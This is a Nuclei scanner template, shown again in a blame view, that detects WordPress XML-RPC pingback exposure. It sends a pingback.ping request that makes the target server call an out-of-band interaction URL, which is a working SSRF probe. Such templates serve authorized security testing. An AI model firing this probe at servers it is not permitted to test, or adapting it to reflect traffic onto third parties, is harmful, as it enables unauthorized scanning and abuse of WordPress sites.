nuclei-templates/http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detectio...

id: wp-xmlrpc-pingback-detection

info:
  name: Wordpress XMLRPC Pingback detection
  author: pdteam
  severity: info
  description: WordPress XML-RPC Pingback Detection refers to the identification and monitoring of XML-RPC Pingback functionality in a WordPress website. This is vulnerable to pingback detection and bruteforce attacks.
  reference:
    - https://github.com/dorkerdevil/rpckiller
    - https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
  metadata:
    max-request: 1
  tags: wordpress,ssrf,oast,xmlrpc

http:
  - raw:
      - |
        POST /xmlrpc.php HTTP/1.1
        Host: {{Hostname}}

        <methodCall>
          <methodName>pingback.ping</methodName>
          <params>
            <param>
              <value>
                <string>http://{{interactsh-url}}</string>
              </value>
            </param>
            <param>
              <value>
                <string>{{BaseURL}}/?p=1</string>
              </value>
            </param>
          </params>
        </methodCall>

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 490a0046304402204dfa653ba571fed5ce42b191a2069f0963385a24f8276d0c276d90ff750f52f2022049781dbe29e833c90847baf9db57c618395ea5d29e2ea161f025bffd24fd2946:922c64590222798bb761d5b6d8e72950
Added Wordpress XMLRPC Pingback detection 2021-09-21 09:48:49 +00:00			`id: wp-xmlrpc-pingback-detection`

			`info:`
			`name: Wordpress XMLRPC Pingback detection`
			`author: pdteam`
			`severity: info`
Updated descriptions of templates 2024-01-02 15:45:12 +00:00			`description: WordPress XML-RPC Pingback Detection refers to the identification and monitoring of XML-RPC Pingback functionality in a WordPress website. This is vulnerable to pingback detection and bruteforce attacks.`
Added Wordpress XMLRPC Pingback detection 2021-09-21 09:48:49 +00:00			`reference:`
			`- https://github.com/dorkerdevil/rpckiller`
			`- https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
templateman update 2023-10-14 11:27:55 +00:00			`tags: wordpress,ssrf,oast,xmlrpc`
Added Wordpress XMLRPC Pingback detection 2021-09-21 09:48:49 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added Wordpress XMLRPC Pingback detection 2021-09-21 09:48:49 +00:00			`- raw:`
			`- \|`
			`POST /xmlrpc.php HTTP/1.1`
			`Host: {{Hostname}}`

			`<methodCall>`
			`<methodName>pingback.ping</methodName>`
			`<params>`
			`<param>`
			`<value>`
			`<string>http://{{interactsh-url}}</string>`
			`</value>`
			`</param>`
			`<param>`
			`<value>`
			`<string>{{BaseURL}}/?p=1</string>`
			`</value>`
			`</param>`
			`</params>`
			`</methodCall>`

			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- "http"`
Auto Template Signing [Mon Jan 15 11:49:24 UTC 2024] :robot: 2024-01-15 11:49:24 +00:00			`# digest: 490a0046304402204dfa653ba571fed5ce42b191a2069f0963385a24f8276d0c276d90ff750f52f2022049781dbe29e833c90847baf9db57c618395ea5d29e2ea161f025bffd24fd2946:922c64590222798bb761d5b6d8e72950`